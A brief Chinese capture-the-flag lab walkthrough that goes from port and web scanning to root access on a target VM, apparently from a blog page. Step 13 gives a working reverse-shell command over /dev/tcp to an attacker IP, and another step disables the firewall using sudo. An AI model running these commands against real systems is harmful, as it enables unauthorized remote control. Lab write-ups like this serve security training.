开门见山

1. 扫描靶机ip,发现PCS 172.18.5.1

2. 用nmap扫描靶机开放服务和服务版本

3. 再扫描靶机全部信息

4. 用nikto工具扫描http服务的敏感信息

5. 打开浏览器查看发现的网页

6. 查看临时缓冲目录

7. 查看home目录,挖掘用户信息

8. 查看具体用户的目录

9. 查看靶机的信息

10. 利用ssh命令,执行root权限命令

11. 用bill执行root权限关闭防火墙

12. 攻击机启动监听

13. 靶机反弹shell,使用命令:ssh bill@localhost sudo bash -i >& /dev/tcp/172.18.5.251/4444 0>& 1

14. 攻击机终端收到反馈shell

15. 还有一种shell反弹

16. 在 /root目录下查找flag文件并查看

最新文章

  1. linux命令 - alias
  2. iOS开发小技巧--UIButton的另一种布局方法(第一种在layoutSubViews方法中,这一种利用苹果提供的两个返回CGRect的方法)
  3. LCLFramework框架之Plugin模式
  4. 英语语法最终珍藏版笔记-17名词性-主语-宾语-同位语-表语-that从句
  5. 使用webdav实现文档共享
  6. java的动态绑定与双分派(规避instanceof)
  7. 只获取linux ip的命令
  8. 《实验数据的结构化程序设计》 2.4.4Calendar个人意见,寻求指引
  9. 递归添加 另一个ds 里的DataRow 时 报错:该行已经属于另一个表。
  10. Iterator 的hasNext方法和next方法
  11. FTP 安装配置
  12. LAMP基础
  13. Go 学习
  14. [R] t.test()
  15. Javascript权威指南阅读笔记--第3章类型、值和变量(1)
  16. shell脚本监控cpu/内存使用率 转
  17. PHP:第三章——PHP中的递归函数
  18. CSS3小黄人
  19. 七牛云整合Ueditor的ThinkPHP版本
  20. Go语言特点

热门文章

  1. python内置模块(python标准库)
  2. Centos 7.5安装 Mysql5.7.24
  3. 雪花算法 Snowflake & Sonyflake
  4. 洛谷$P2150\ [NOI2015]$寿司晚宴 $dp$
  5. TemplateMethodPattern(模板方法模式)-----Java/.Net
  6. 聊聊Python中的描述符
  7. GPL协议中国第一案尘埃落定,相关开源软件应如何风控?
  8. Codeforces Round #612 (Div. 2) 前四题题解
  9. Prometheus基础应用
  10. 高德API对接